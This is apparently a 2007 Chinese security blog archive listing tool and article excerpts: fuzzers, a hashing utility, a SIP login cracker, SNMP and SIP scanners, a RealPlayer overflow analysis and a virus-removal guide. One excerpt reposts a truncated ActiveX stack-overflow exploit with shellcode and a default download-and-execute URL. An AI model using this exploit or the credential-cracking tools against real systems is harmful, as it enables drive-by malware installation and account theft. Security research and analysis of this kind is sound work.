Fuzzers

2007/11/25 2:44 | 鬼仔 | 工具收集 | 消灭0留言

来源:zwell's blog

关键字(Keywords) : fuzzing, fuzz testing, fuzzer.

antiparser
antiparser is a fuzz testing and fault injection API. The purpose of antiparser is to provide an API that can be used to model network protocols and file formats by their composite data types. Once a model has been created, 阅读全文 »

Tags:

Encoder

2007/11/25 2:40 | 鬼仔 | 工具收集 | 消灭0留言

Name: encoder
Version: 1.0
Author: ZwelL
Date: 2007.10.30
Link: http://www.nosec.org/web/index.php?q=encoder
Download: encoder.exe

Support:
* BASE64
* URI
* MD4
* MD5-32
* SHA1
* SHA256
* SHA384
* SHA512
* CRC32

Tags:

sipNosec

2007/11/25 2:35 | 鬼仔 | 工具收集 | 消灭0留言

Name: sipNosec

Version: 1.0

Author: ZwelL

Date: 2007.8.12

Link: http://www.nosec.org/web/index.php?q=sipNosec

Download: sipNosec.exe

sipNosec is a SIP protocol login cracker that contains 2 components: sniffer and cracker. It is similar to sipcrack 阅读全文 »

Tags:

siprint

2007/11/25 2:31 | 鬼仔 | 工具收集 | 消灭0留言

Name: siprint
Version: 1.1
Author: ZwelL
Date: 2007.7.8
Link: http://www.nosec.org/web/index.php?q=siprint
Download: siprint.exe signatures.txt

Today I officially released the siprint tool to the wide public. As the name show : siprint 阅读全文 »

Tags:

SnmpDigger–SNMP客户端程序

2007/11/24 12:41 | 鬼仔 | 工具收集 | 消灭0留言

作者:zwell
来源:zwell's blog

昨天与同事聊起了SNMP协议的一些东西。就随手做了个SNMP的客户端。

事实上在一些渗透测试过程中,通过SNMP是能够做很多事情的,简单的来说信息泄露一般都存在,运气好的话还能来个“拒绝服务”。

之前用的一些商用版的,存在版权问题,现在自己做了一个,用的很顺手,以后有需要再加吧 ;)
Name: SnmpDigger
Version: 0.2
Author: ZwelL
Date: 2007.11.23
Link: http://www.nosec.org/web/index.php?q=snmpdigger
Download: snmpdigger_bin.rar
阅读全文 »

Tags: ,

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

2007/11/24 5:32 | 鬼仔 | 工具收集 | 消灭0留言

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

RealPlayer 6.0.10 到 6.0.14 整数溢出分析

2007/11/24 4:47 | 鬼仔 | 技术文章 | 消灭0留言

作 者: dummy
时 间: 2007-11-23,00:10
链 接: http://bbs.pediy.com/showthread.php?t=55357

RealPlayer 6.0.10 到 6.0.14 整数溢出分析

今天早上茄子就告诉我 cnbeta 被挂马了,使用最近出现的各种漏洞。
其中比较有意思的是,一个脚本中使用没有见过的 realplayer 溢出。

先从 realplayer 目录 rpplugins\ierpplug.dll 中的 IIERPCtl.Import 开始讲起,
下面是其声明
HRESULT Import(
[in] BSTR file,
阅读全文 »

Tags:

自己利用BCB写病毒专杀

2007/11/24 2:51 | 鬼仔 | 技术文章 | 消灭0留言

来源:灰狐's Blog

注:本文已发表在2007年《黑客防线》第11期,转载请注明出处!

话说某天晚上,小菜我写代码写的煞是心烦,刚想放松一会儿,任务栏里的企鹅图标就不停地叫了起来,MM求救:电脑中毒了。
她的卡巴已经查到了病毒,但没有杀掉。根据扫描提示,很快在百度上找到了答案,司机报警的文件名为algsrvs.exe,经查得知是fun.xls.exe病毒,tel.xls.exe的变种之一。网上给出了一个比较完整的查杀方法,主要症状如下:
1、在“我的电脑”中双击任意驱动器时,会在新窗口中打开此驱动器;
2、不能显示隐藏文件;
3、右击任一驱动器时,在快捷菜单中的第一项显有“Auto”命令;
查杀方法:
第一步:在“任务管理器”中结束“Excel”程序(也就是algsrvs.exe进程);
第二步:删除如下四个文件:
阅读全文 »

Tags: